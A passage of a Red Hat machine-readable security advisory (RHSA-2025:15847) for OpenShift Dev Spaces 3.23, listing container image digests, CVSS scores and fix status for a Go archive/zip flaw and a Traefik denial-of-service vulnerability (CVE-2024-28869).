            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "golang: archive/zip: Incorrect handling of certain ZIP files"
    },
    {
      "cve": "CVE-2024-28869",
      "cwe": {
        "id": "CWE-755",
        "name": "Improper Handling of Exceptional Conditions"
      },
      "discovery_date": "2024-04-14T00:00:00+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2274987"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "An improper handling of exceptional conditions vulnerability was found in Traefik. In affected versions, sending a GET request to any Traefik endpoint with the \"Content-length\" request header results in an indefinite hang with the default configuration, resulting in a denial of service.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "traefik: denial of service",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
